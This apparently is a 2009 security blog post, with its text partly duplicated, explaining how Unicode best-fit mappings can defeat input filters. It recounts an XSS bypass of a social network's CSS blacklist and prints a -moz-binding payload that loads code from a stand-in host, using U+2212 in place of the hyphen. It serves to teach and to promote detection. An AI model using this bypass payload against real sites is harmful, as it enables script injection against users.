Unicode security attacks and test cases – Best-fit mappings and String transformations
07 May 2009
Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood. On the defensive side, if you can only remember two things:
Ah forget it, unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.
The term best-fit mapping describes the concept of how a character should be represented when it doesn’t have an explicit place in a destination character set.
I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They just implemented a new profile editor complete with user-ccontrolled CSS. They were smart though, they actually knew that stuff like this would lead to XSS:
So they implemented some sort of blacklist because well that’s common. Anyway, somewhere in the callstack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter, and come out transformed into the character I needed. The input:
The first character here is U+2212, the MINUS SIGN (−) which was being transformed through an apparent best-fit mapping into U+002D, or -.
The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?
- Converting to Unicode is safe.
- Converting between legacy character sets is dangerous.
Ah forget it, unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.
The term best-fit mapping describes the concept of how a character should be represented when it doesn’t have an explicit place in a destination character set.
I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They just implemented a new profile editor complete with user-ccontrolled CSS. They were smart though, they actually knew that stuff like this would lead to XSS:
−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)
So they implemented some sort of blacklist because well that’s common. Anyway, somewhere in the callstack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter, and come out transformed into the character I needed. The input:
−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)
The first character here is U+2212, the MINUS SIGN (−) which was being transformed through an apparent best-fit mapping into U+002D, or -.
The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?
Soroush.SecProject.com